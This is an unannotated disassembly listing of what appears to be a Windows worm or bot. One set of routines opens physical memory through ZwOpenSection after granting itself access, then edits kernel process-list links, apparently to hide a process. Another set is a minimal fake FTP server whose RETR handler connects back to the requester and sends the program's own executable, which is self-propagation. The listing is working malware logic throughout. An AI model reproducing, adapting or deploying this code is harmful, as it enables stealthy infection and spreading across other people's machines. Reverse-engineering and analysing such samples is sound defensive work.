call dword_454330 ; recv
cmp eax, edi
jz loc_401C39
cmp [ebp+var_200E], 0Ch
jnz short loc_401C39
push ebx
push 18h
push offset dword_432B2C
push [ebp+arg_4]
call dword_454350 ; send
cmp eax, edi
jz short loc_401C39
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_454330 ; recv
mov esi, eax
cmp esi, edi
jz short loc_401C39
cmp [ebp+var_200E], 2
jnz short loc_401C39
push 10h
push offset dword_432B48
lea eax, [ebp+var_2010]
push esi
push eax
call sub_401A7A
add esp, 10h
test eax, eax
jz short loc_401C19
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_401C37
; ---------------------------------------------------------------------------
loc_401C19: ; CODE XREF: sub_401AB3+156�j
push 10h
push offset dword_432B5C
lea eax, [ebp+var_2010]
push esi
push eax
call sub_401A7A
add esp, 10h
neg eax
sbb eax, eax
and eax, 3
loc_401C37: ; CODE XREF: sub_401AB3+164�j
mov ebx, eax
loc_401C39: ; CODE XREF: sub_401AB3+C2�j
; sub_401AB3+D9�j ...
push [ebp+arg_4]
call dword_4543AC ; closesocket
mov eax, ebx
pop ebx
jmp loc_401B0E
sub_401AB3 endp
; =============== S U B R O U T I N E =======================================
sub_401C4A proc near ; CODE XREF: sub_40203F+B5�p
push offset aNtdll_dll ; "ntdll.dll"
call dword_42F138 ; LoadLibraryA
test eax, eax
mov dword_44D68C, eax
jz short loc_401C96
push esi
mov esi, dword_42F13C
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push eax
call esi ; dword_42F13C
push offset aZwopensection ; "ZwOpenSection"
mov dword_44D684, eax
push dword_44D68C
call esi ; dword_42F13C
cmp dword_44D684, 0
mov dword_44D688, eax
pop esi
jz short loc_401C96
test eax, eax
jz short loc_401C96
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_401C96: ; CODE XREF: sub_401C4A+12�j
; sub_401C4A+42�j ...
xor eax, eax
retn
sub_401C4A endp
; =============== S U B R O U T I N E =======================================
sub_401C99 proc near ; CODE XREF: sub_40203F+12C�p
; sub_40203F:loc_402184�p
mov eax, dword_44D68C
test eax, eax
jz short loc_401CA9
push eax
call dword_42F0BC ; FreeLibrary
loc_401CA9: ; CODE XREF: sub_401C99+7�j
and dword_44D68C, 0
retn
sub_401C99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CB1 proc near ; CODE XREF: sub_401D57+9B�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push esi
lea eax, [ebp+var_8]
push edi
xor esi, esi
push eax
lea eax, [ebp+var_C]
push esi
push eax
push esi
push esi
push 4
push 6
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call dword_42F01C ; GetSecurityInfo
test eax, eax
jnz short loc_401D53
push 20h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_4221F0
add esp, 0Ch
lea ecx, [ebp+var_4]
xor eax, eax
mov [ebp+var_2C], 2
push ecx
lea ecx, [ebp+var_2C]
push [ebp+var_C]
inc eax
mov [ebp+var_28], eax
mov [ebp+var_24], esi
push ecx
push eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], offset aCurrent_user ; "CURRENT_USER"
mov [ebp+var_4], esi
call dword_42F020 ; SetEntriesInAclA
test eax, eax
jnz short loc_401D39
push esi
push [ebp+var_4]
push esi
push esi
push 4
push 6
push [ebp+arg_0]
call dword_42F024 ; SetSecurityInfo
test eax, eax
jz short loc_401D53
loc_401D39: ; CODE XREF: sub_401CB1+6F�j
cmp [ebp+var_8], esi
mov edi, dword_42F030
jz short loc_401D49
push [ebp+var_8]
call edi ; dword_42F030
loc_401D49: ; CODE XREF: sub_401CB1+91�j
cmp [ebp+var_4], esi
jz short loc_401D53
push [ebp+var_4]
call edi ; dword_42F030
loc_401D53: ; CODE XREF: sub_401CB1+2A�j
; sub_401CB1+86�j ...
pop edi
pop esi
leave
retn
sub_401CB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D57 proc near ; CODE XREF: sub_40203F+C2�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword_44C4F4
mov ecx, dword_44C4F8
push ebx
push edi
xor ebx, ebx
xor edi, edi
cmp eax, 6
mov edx, 39000h
jnz short loc_401D82
cmp ecx, ebx
jnz loc_401E43
mov edi, edx
loc_401D82: ; CODE XREF: sub_401D57+1F�j
cmp eax, 5
jnz loc_401E24
cmp ecx, ebx
jz short loc_401D98
cmp ecx, 1
jnz loc_401E1B
loc_401D98: ; CODE XREF: sub_401D57+36�j
mov edi, edx
loc_401D9A: ; CODE XREF: sub_401D57+E6�j
push esi
lea eax, [ebp+var_8]
push offset off_432E04
push eax
call dword_44D684 ; RtlInitUnicodeString
lea eax, [ebp+var_8]
mov esi, offset dword_44D694
mov [ebp+var_18], eax
lea eax, [ebp+var_20]
push eax
push 6
push esi
mov [ebp+var_20], 18h
mov [ebp+var_1C], ebx
mov [ebp+var_14], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call dword_44D688 ; ZwOpenSection
cmp eax, 0C0000022h
jnz short loc_401E11
lea eax, [ebp+var_20]
push eax
push 60000h
push esi
call dword_44D688 ; ZwOpenSection
push dword_44D694
call sub_401CB1
pop ecx
push dword_44D694
call dword_42F038 ; CloseHandle
lea eax, [ebp+var_20]
push eax
push 6
push esi
call dword_44D688 ; ZwOpenSection
loc_401E11: ; CODE XREF: sub_401D57+83�j
cmp eax, ebx
pop esi
jge short loc_401E48
push 0FFFFFFFEh
pop eax
jmp short loc_401E72
; ---------------------------------------------------------------------------
loc_401E1B: ; CODE XREF: sub_401D57+3B�j
cmp ecx, 2
jnz short loc_401E3B
mov edi, edx
jmp short loc_401E3B
; ---------------------------------------------------------------------------
loc_401E24: ; CODE XREF: sub_401D57+2E�j
cmp eax, 4
jnz short loc_401E3B
cmp ecx, ebx
jnz short loc_401E3B
cmp dword_44C500, 2
jnz short loc_401E3B
mov edi, 30000h
loc_401E3B: ; CODE XREF: sub_401D57+C7�j
; sub_401D57+CB�j ...
cmp edi, ebx
jnz loc_401D9A
loc_401E43: ; CODE XREF: sub_401D57+23�j
or eax, 0FFFFFFFFh
jmp short loc_401E72
; ---------------------------------------------------------------------------
loc_401E48: ; CODE XREF: sub_401D57+BD�j
push 1000h
push edi
push ebx
push 6
push dword_44D694
call dword_42F034 ; MapViewOfFile
xor ecx, ecx
cmp eax, ebx
setnz cl
mov dword_44D690, eax
lea ecx, ds:0FFFFFFFDh[ecx*4]
mov eax, ecx
loc_401E72: ; CODE XREF: sub_401D57+C2�j
; sub_401D57+EF�j
pop edi
pop ebx
leave
retn
sub_401D57 endp
; =============== S U B R O U T I N E =======================================
sub_401E76 proc near ; CODE XREF: sub_40203F+127�p
; sub_40203F:loc_40217F�p
mov eax, dword_44D690
test eax, eax
jz short loc_401E86
push eax
call dword_42F03C ; UnmapViewOfFile
loc_401E86: ; CODE XREF: sub_401E76+7�j
mov eax, dword_44D694
test eax, eax
jz short loc_401E96
push eax
call dword_42F038 ; CloseHandle
loc_401E96: ; CODE XREF: sub_401E76+17�j
and dword_44D690, 0
and dword_44D694, 0
retn
sub_401E76 endp
; =============== S U B R O U T I N E =======================================
sub_401EA5 proc near ; CODE XREF: sub_401F1D+B�p
; sub_401F6E+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
push edi
jz short loc_401F18
mov edi, [esp+8+arg_4]
mov ecx, edi
shr ecx, 16h
mov eax, [eax+ecx*4]
test al, 1
jz short loc_401F18
test al, al
jns short loc_401ED1
mov esi, eax
xor esi, edi
and esi, 3FFFFFh
xor esi, eax
jmp short loc_401F14
; ---------------------------------------------------------------------------
loc_401ED1: ; CODE XREF: sub_401EA5+1C�j
and ax, 0F000h
push 1000h
push eax
push 0
push 0F001Fh
push dword_44D694
call dword_42F034 ; MapViewOfFile
mov ecx, edi
shr ecx, 0Ch
and ecx, 3FFh
mov ecx, [eax+ecx*4]
test cl, 1
jz short loc_401F18
mov esi, ecx
push eax
xor esi, edi
and esi, 0FFFh
xor esi, ecx
call dword_42F03C ; UnmapViewOfFile
loc_401F14: ; CODE XREF: sub_401EA5+2A�j
mov eax, esi
jmp short loc_401F1A
; ---------------------------------------------------------------------------
loc_401F18: ; CODE XREF: sub_401EA5+8�j
; sub_401EA5+18�j ...
xor eax, eax
loc_401F1A: ; CODE XREF: sub_401EA5+71�j
pop edi
pop esi
retn
sub_401EA5 endp
; =============== S U B R O U T I N E =======================================
sub_401F1D proc near ; CODE XREF: sub_40203F+D1�p
; sub_40203F+DF�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
push dword_44D690
call sub_401EA5
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_401F53
and ax, 0F000h
push 1000h
push eax
push 0
push 4
push dword_44D694
call dword_42F034 ; MapViewOfFile
test eax, eax
jnz short loc_401F57
loc_401F53: ; CODE XREF: sub_401F1D+16�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401F57: ; CODE XREF: sub_401F1D+34�j
shr esi, 2
and esi, 3FFh
push eax
mov esi, [eax+esi*4]
call dword_42F03C ; UnmapViewOfFile
mov eax, esi
pop esi
retn
sub_401F1D endp
; =============== S U B R O U T I N E =======================================
sub_401F6E proc near ; CODE XREF: sub_40203F+10F�p
; sub_40203F+11C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
push dword_44D690
call sub_401EA5
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_401FA4
and ax, 0F000h
push 1000h
push eax
push 0
push 2
push dword_44D694
call dword_42F034 ; MapViewOfFile
test eax, eax
jnz short loc_401FA8
loc_401FA4: ; CODE XREF: sub_401F6E+16�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401FA8: ; CODE XREF: sub_401F6E+34�j
mov ecx, [esp+4+arg_4]
push eax
shr esi, 2
and esi, 3FFh
mov [eax+esi*4], ecx
call dword_42F03C ; UnmapViewOfFile
xor eax, eax
pop esi
inc eax
retn
sub_401F6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FC4 proc near ; CODE XREF: sub_40203F+AE�p
; sub_40203F+134�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_42F040 ; GetCurrentProcess
push eax
call dword_42F010 ; OpenProcessToken
test eax, eax
jnz short loc_401FE3
leave
retn
; ---------------------------------------------------------------------------
loc_401FE3: ; CODE XREF: sub_401FC4+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_42F014 ; LookupPrivilegeValueA
test eax, eax
jz short loc_402031
mov eax, [ebp+var_10]
mov [ebp+var_20], 1
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_4], esi
setz al
lea eax, [eax+eax+2]
mov [ebp+var_14], eax
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+var_20]
push 10h
push eax
push esi
push [ebp+var_4]
call dword_42F018 ; AdjustTokenPrivileges
mov esi, eax
loc_402031: ; CODE XREF: sub_401FC4+32�j
push [ebp+var_4]
call dword_42F038 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_401FC4 endp
; =============== S U B R O U T I N E =======================================
sub_40203F proc near ; CODE XREF: sub_412267+131�p
push ebx
push ebp
push esi
push edi
push offset dword_44C4F0
mov dword_44C4F0, 94h
call dword_42F044 ; GetVersionExA
test eax, eax
jz loc_402189
mov ecx, dword_44C4F4
mov eax, dword_44C4F8
xor edi, edi
xor ebx, ebx
cmp ecx, 6
jnz short loc_402082
test eax, eax
jnz loc_402189
push 3Ch
pop edi
push 30h
pop ebx
loc_402082: ; CODE XREF: sub_40203F+33�j
cmp ecx, 5
jnz short loc_4020B9
test eax, eax
jnz short loc_402097
mov edi, 0A0h
mov ebx, 0A4h
jmp short loc_4020E5
; ---------------------------------------------------------------------------
loc_402097: ; CODE XREF: sub_40203F+4A�j
cmp eax, 1
jnz short loc_4020A8
mov edi, 88h
mov ebx, 8Ch
jmp short loc_4020E5
; ---------------------------------------------------------------------------
loc_4020A8: ; CODE XREF: sub_40203F+5B�j
cmp eax, 2
jnz short loc_4020D5
mov edi, 8Ah
mov ebx, 8Eh
jmp short loc_4020D5
; ---------------------------------------------------------------------------
loc_4020B9: ; CODE XREF: sub_40203F+46�j
cmp ecx, 4
jnz short loc_4020D5
test eax, eax
jnz short loc_4020D5
cmp dword_44C500, 2
jnz short loc_4020D5
mov edi, 98h
mov ebx, 9Ch
loc_4020D5: ; CODE XREF: sub_40203F+6C�j
; sub_40203F+78�j ...
test edi, edi
jz loc_402189
test ebx, ebx
jz loc_402189
loc_4020E5: ; CODE XREF: sub_40203F+56�j
; sub_40203F+67�j
mov ebp, offset aSesecuritypriv ; "SeSecurityPrivilege"
push 1
push ebp
call sub_401FC4
pop ecx
pop ecx
call sub_401C4A
test eax, eax
jz loc_402189
call sub_401D57
cmp eax, 1
jnz short loc_402184
push 0FFDFF124h
call sub_401F1D
test eax, eax
pop ecx
jz short loc_40217F
add eax, 44h
push eax
call sub_401F1D
mov esi, eax
pop ecx
test esi, esi
jz short loc_40217F
lea eax, [esi+edi]
push eax
call sub_401F1D
add esi, ebx
mov edi, eax
push esi
call sub_401F1D
pop ecx
mov esi, eax
test edi, edi
pop ecx
jz short loc_40217F
test esi, esi
jz short loc_40217F
lea eax, [edi+4]
push esi
push eax
call sub_401F6E
pop ecx
test eax, eax
pop ecx
jz short loc_40217F
push edi
push esi
call sub_401F6E
pop ecx
test eax, eax
pop ecx
jz short loc_40217F
call sub_401E76
call sub_401C99
push 0
push ebp
call sub_401FC4
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_40218B
; ---------------------------------------------------------------------------
loc_40217F: ; CODE XREF: sub_40203F+D9�j
; sub_40203F+E9�j ...
call sub_401E76
loc_402184: ; CODE XREF: sub_40203F+CA�j
call sub_401C99
loc_402189: ; CODE XREF: sub_40203F+1B�j
; sub_40203F+37�j ...
xor eax, eax
loc_40218B: ; CODE XREF: sub_40203F+13E�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40203F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402190 proc near ; DATA XREF: sub_401477+104�o
; sub_403B2C+1A20�o
var_16F8 = byte ptr -16F8h
var_6F8 = byte ptr -6F8h
var_694 = byte ptr -694h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_3F8 = dword ptr -3F8h
var_3EC = dword ptr -3ECh
var_3E8 = dword ptr -3E8h
var_2E4 = byte ptr -2E4h
var_2B0 = byte ptr -2B0h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_148 = byte ptr -148h
var_138 = byte ptr -138h
var_D4 = byte ptr -0D4h
var_A0 = byte ptr -0A0h
var_90 = word ptr -90h
var_8E = word ptr -8Eh
var_8C = dword ptr -8Ch
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_74 = byte ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = byte ptr -14h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16F8h
call sub_4220C0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ABh
mov esi, eax
lea edi, [ebp+var_694]
xor ebx, ebx
rep movsd
xor esi, esi
push ebx
inc esi
push ebx
mov [eax+2A4h], esi
mov eax, [ebp+var_3EC]
push ebx
mov [ebp+var_70], eax
mov eax, [ebp+var_480]
push offset sub_414926
push ebx
push ebx
mov [ebp+var_48], esi
mov [ebp+var_4C], esi
mov [ebp+var_24C], ebx
mov [ebp+var_3E8], ebx
mov dword_44D680, eax
call dword_42F158 ; CreateThread
push ebx
push esi
push 2
call dword_454394 ; socket
lea ecx, [ebp+var_48]
push 4
push ecx
push 4
push 0FFFFh
push eax
mov dword_44D66C, eax
call dword_4542F0 ; setsockopt
lea eax, [ebp+var_4C]
push eax
push 8004667Eh
push dword_44D66C
call dword_4543B0 ; ioctlsocket
mov ax, word ptr dword_44D680
mov [ebp+var_90], 2
push eax
mov [ebp+var_8C], ebx
call dword_454314 ; ntohs
mov [ebp+var_8E], ax
lea eax, [ebp+var_90]
push 10h
push eax
push dword_44D66C
call dword_454344 ; bind
test eax, eax
jge short loc_40226E
mov eax, esi
jmp loc_4026EA
; ---------------------------------------------------------------------------
loc_40226E: ; CODE XREF: sub_402190+D5�j
push 0Ah
push dword_44D66C
call dword_454340 ; listen
mov eax, dword_44D66C
mov [ebp+var_24C], esi
mov [ebp+var_248], eax
mov [ebp+var_4], eax
loc_402290: ; CODE XREF: sub_402190+137�j
; sub_402190+552�j
push 41h
lea eax, [ebp+var_3E8]
pop ecx
lea esi, [ebp+var_24C]
push ebx
push ebx
push ebx
push eax
mov eax, [ebp+var_4]
lea edi, [ebp+var_3E8]
inc eax
rep movsd
push eax
call dword_4542FC ; select
cmp eax, 0FFFFFFFFh
jz loc_4026E7
xor esi, esi
cmp [ebp+var_4], ebx
mov [ebp+arg_0], esi
jl short loc_402290
loc_4022C9: ; CODE XREF: sub_402190+54C�j
push 64h
lea eax, [ebp+var_2B0]
push ebx
push eax
call sub_4221F0
push 64h
lea eax, [ebp+var_138]
push ebx
push eax
call sub_4221F0
add esp, 18h
lea eax, [ebp+var_3E8]
push eax
push esi
call dword_4541E4 ; __WSAFDIsSet
test eax, eax
jz loc_4026D5
mov eax, dword_44D66C
cmp esi, eax
jnz loc_402393
lea ecx, [ebp+var_20]
mov [ebp+var_20], 10h
push ecx
lea ecx, [ebp+var_148]
push ecx
push eax
call dword_4543A4 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_58], eax
jz loc_4026D5
mov edx, [ebp+var_24C]
xor ecx, ecx
cmp edx, ebx
jbe short loc_40234C
loc_40233E: ; CODE XREF: sub_402190+1BA�j
cmp [ebp+ecx*4+var_248], eax
jz short loc_40234C
inc ecx
cmp ecx, edx
jb short loc_40233E
loc_40234C: ; CODE XREF: sub_402190+1AC�j
; sub_402190+1B5�j
cmp ecx, edx
jnz short loc_402362
cmp edx, 40h
jnb short loc_402362
mov [ebp+ecx*4+var_248], eax
inc [ebp+var_24C]
loc_402362: ; CODE XREF: sub_402190+1BE�j
; sub_402190+1C3�j
cmp eax, [ebp+var_4]
jle short loc_40236A
mov [ebp+var_4], eax
loc_40236A: ; CODE XREF: sub_402190+1D5�j
mov esi, offset a220 ; "220\r\n"
lea edi, [ebp+var_54]
movsd
lea eax, [ebp+var_54]
push ebx
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_54]
push eax
push [ebp+var_58]
call dword_454350 ; send
jmp loc_4026D2
; ---------------------------------------------------------------------------
loc_402393: ; CODE XREF: sub_402190+177�j
push ebx
lea eax, [ebp+var_2B0]
push 64h
push eax
push esi
call dword_454330 ; recv
test eax, eax
jg short loc_4023F0
mov ecx, [ebp+var_24C]
xor eax, eax
cmp ecx, ebx
jbe short loc_4023E4
loc_4023B4: ; CODE XREF: sub_402190+230�j
cmp [ebp+eax*4+var_248], esi
jz short loc_4023D9
inc eax
cmp eax, ecx
jb short loc_4023B4
jmp short loc_4023E4
; ---------------------------------------------------------------------------
loc_4023C4: ; CODE XREF: sub_402190+24C�j
mov ecx, [ebp+eax*4+var_244]
mov [ebp+eax*4+var_248], ecx
mov ecx, [ebp+var_24C]
inc eax
loc_4023D9: ; CODE XREF: sub_402190+22B�j
dec ecx
cmp eax, ecx
jb short loc_4023C4
dec [ebp+var_24C]
loc_4023E4: ; CODE XREF: sub_402190+222�j
; sub_402190+232�j
push esi
call dword_4543AC ; closesocket
jmp loc_4026D5
; ---------------------------------------------------------------------------
loc_4023F0: ; CODE XREF: sub_402190+216�j
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_2B0]
push offset aSS_0 ; "%s %s"
push eax
call sub_422725
lea eax, [ebp+var_138]
push offset aUser ; "USER"
push eax
call sub_422760
add esp, 18h
test eax, eax
jnz short loc_402446
mov esi, offset a331 ; "331\r\n"
lea edi, [ebp+var_6C]
movsd
lea eax, [ebp+var_6C]
push ebx
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_6C]
jmp loc_4026B6
; ---------------------------------------------------------------------------
loc_402446: ; CODE XREF: sub_402190+295�j
lea eax, [ebp+var_138]
push offset aPass ; "PASS"
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40247C
mov esi, offset a230 ; "230\r\n"
lea edi, [ebp+var_60]
movsd
lea eax, [ebp+var_60]
push ebx
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_60]
jmp loc_4026B6
; ---------------------------------------------------------------------------
loc_40247C: ; CODE XREF: sub_402190+2CB�j
lea eax, [ebp+var_138]
push offset aPort ; "PORT"
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_40255C
lea eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_2B0]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_422725
lea eax, [ebp+var_D4]
push eax
call sub_422B5A
mov esi, eax
lea eax, [ebp+var_2E4]
push eax
call sub_422B5A
mov edi, eax
push 32h
lea eax, [ebp+var_D4]
push ebx
push eax
call sub_4221F0
push edi
push esi
lea eax, [ebp+var_D4]
push offset aXX ; "%x%x\n"
push eax
call sub_422063
add esp, 44h
lea eax, [ebp+var_D4]
push 10h
push ebx
push eax
call sub_422AB8
mov [ebp+var_44], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_A0]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_422063
mov esi, offset a200 ; "200\r\n"
lea edi, [ebp+var_7C]
add esp, 24h
lea eax, [ebp+var_7C]
movsd
push ebx
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_7C]
jmp loc_4026B6
; ---------------------------------------------------------------------------
loc_40255C: ; CODE XREF: sub_402190+301�j
lea eax, [ebp+var_138]
push offset aRetr ; "RETR"
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_40266A
mov esi, offset a150 ; "150\r\n"
lea edi, [ebp+var_C]
movsd
lea eax, [ebp+var_C]
push ebx
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
call dword_454350 ; send
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+var_47C]
push [ebp+var_3F8]
push eax
lea eax, [ebp+var_16F8]
push [ebp+var_3EC]
push eax
lea eax, [ebp+var_A0]
push [ebp+var_44]
push eax
call sub_4026F1
add esp, 1Ch
test eax, eax
jz short loc_40264E
push [ebp+var_80]
call sub_40274D
pop ecx
mov esi, offset a226 ; "226\r\n"
test eax, eax
push ebx
jle short loc_402638
lea edi, [ebp+var_14]
lea eax, [ebp+var_14]
movsd
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_454350 ; send
inc dword_455398
cmp [ebp+var_3F8], ebx
jnz loc_4026C0
lea eax, [ebp+var_A0]
push eax
push offset aPnmnw_7rscg0 ; "PnmNw.7RScG0"
push offset aSS_1 ; "%s -> %s"
push offset dword_439644
push [ebp+var_70]
call sub_4104F6
add esp, 14h
jmp loc_4026C0
; ---------------------------------------------------------------------------
loc_402638: ; CODE XREF: sub_402190+450�j
lea edi, [ebp+var_1C]
lea eax, [ebp+var_1C]
movsd
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_1C]
jmp short loc_4026B6
; ---------------------------------------------------------------------------
loc_40264E: ; CODE XREF: sub_402190+43D�j
mov esi, offset a425 ; "425\r\n"
lea edi, [ebp+var_28]
movsd
lea eax, [ebp+var_28]
push ebx
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_28]
jmp short loc_4026B6
; ---------------------------------------------------------------------------
loc_40266A: ; CODE XREF: sub_402190+3E1�j
lea eax, [ebp+var_138]
push offset aQuit ; "QUIT"
push eax
call sub_422760
pop ecx
pop ecx
test eax, eax
push ebx
jnz short loc_40269D
mov esi, offset a221 ; "221\r\n"
lea edi, [ebp+var_34]
movsd
lea eax, [ebp+var_34]
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_34]
jmp short loc_4026B6
; ---------------------------------------------------------------------------
loc_40269D: ; CODE XREF: sub_402190+4F0�j
mov esi, offset a503 ; "503\r\n"
lea edi, [ebp+var_40]
movsd
lea eax, [ebp+var_40]
push eax
movsw
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_40]
loc_4026B6: ; CODE XREF: sub_402190+2B1�j
; sub_402190+2E7�j ...
push eax
push [ebp+arg_0]
call dword_454350 ; send
loc_4026C0: ; CODE XREF: sub_402190+47C�j
; sub_402190+4A3�j
push 64h
lea eax, [ebp+var_2B0]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
loc_4026D2: ; CODE XREF: sub_402190+1FE�j
mov esi, [ebp+arg_0]
loc_4026D5: ; CODE XREF: sub_402190+16A�j
; sub_402190+19C�j ...
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jle loc_4022C9
jmp loc_402290
; ---------------------------------------------------------------------------
loc_4026E7: ; CODE XREF: sub_402190+129�j
xor eax, eax
inc eax
loc_4026EA: ; CODE XREF: sub_402190+D9�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_402190 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026F1 proc near ; CODE XREF: sub_402190+433�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 0
push 1
push 2
call dword_454394 ; socket
mov esi, [ebp+arg_18]
push [ebp+arg_0]
mov [ebp+var_10], 2
mov [esi], eax
call dword_45434C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_454314 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword ptr [esi]
call dword_4542AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_402747
push dword ptr [esi]
call dword_4543AC ; closesocket
xor eax, eax
jmp short loc_40274A
; ---------------------------------------------------------------------------
loc_402747: ; CODE XREF: sub_4026F1+48�j
xor eax, eax
inc eax
loc_40274A: ; CODE XREF: sub_4026F1+54�j
pop esi
leave
retn
sub_4026F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40274D proc near ; CODE XREF: sub_402190+442�p
var_1108 = byte ptr -1108h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1108h
call sub_4220C0
push ebx
push esi
push edi
lea eax, [ebp+var_108]
push 104h
xor edi, edi
push eax
push edi
call dword_42F154 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push offset aRb ; "rb"
push eax
call sub_422F66
mov esi, eax
pop ecx
xor ebx, ebx
cmp esi, edi
pop ecx
mov [ebp+var_4], edi
jz short loc_4027FC
push 2
push edi
push esi
call sub_422E7C
push esi
call sub_422CF9
push edi
push edi
push esi
mov [ebp+var_4], eax
call sub_422E7C
add esp, 1Ch
jmp short loc_4027F6
; ---------------------------------------------------------------------------
loc_4027AF: ; CODE XREF: sub_40274D+AD�j
push 1000h
lea eax, [ebp+var_1108]
push edi
push eax
call sub_4221F0
push esi
push 800h
lea eax, [ebp+var_1108]
push 1
push eax
call sub_422BE2
add esp, 1Ch
test byte ptr [esi+0Ch], 20h
jnz short loc_4027FC
cmp eax, edi
jle short loc_4027F6
push edi
push eax
lea eax, [ebp+var_1108]
push eax
push [ebp+arg_0]
call dword_454350 ; send
add ebx, eax
loc_4027F6: ; CODE XREF: sub_40274D+60�j
